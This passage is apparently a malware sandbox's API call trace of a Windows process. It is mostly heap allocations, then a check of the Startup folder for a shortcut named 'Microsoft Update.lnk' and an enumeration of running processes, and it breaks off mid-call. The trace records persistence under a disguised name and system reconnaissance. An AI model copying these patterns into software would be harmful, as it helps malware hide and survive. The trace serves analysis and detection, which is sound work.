hHeap=0x25c0000) returned 1 [0283.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0283.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0283.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0283.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0283.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0283.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0283.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0283.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0283.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0283.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0283.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0283.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0283.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0283.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0283.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0283.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0283.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0283.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0283.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0283.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0283.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0283.786] FreeLibrary (hLibModule=0x74f40000) returned 1 [0283.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0283.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0283.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0283.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0283.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0283.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0283.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0283.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0283.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0283.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0283.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0283.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0283.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0283.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0283.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0283.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0283.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0283.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0283.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0283.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0283.789] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0283.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0283.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0283.789] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0283.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0283.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0283.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0283.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0283.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0283.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0283.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0283.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0283.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0283.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0283.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0283.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0283.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0283.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0283.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0283.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0283.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0283.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0283.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0283.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0283.792] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0283.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0283.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0283.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0283.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0283.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0283.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0283.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0283.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0283.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0283.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0283.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0283.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0283.793] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0283.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0283.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0283.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0283.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0283.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0283.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0283.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0283.796] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0283.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0283.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0283.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0283.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0283.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0283.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0283.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0283.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0283.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0283.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0283.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0283.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0283.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0283.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0283.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0283.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0283.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0283.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0283.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0283.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0283.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0283.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0283.797] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0283.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0283.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0283.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0283.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0283.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0283.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0283.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0283.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0283.798] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0283.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0283.798] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0283.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0283.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0283.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0283.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0283.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0283.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0283.798] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0283.800] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.801] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0283.802] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0283.803] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0283.803] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0283.804] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0283.805] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0283.806] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0283.806] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0283.807] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0283.808] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.809] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.810] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.811] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.825] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.825] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0283.826] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.827] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0283.828] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0283.829] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0283.830] Process32NextW (in: hSnapshot=0x294, 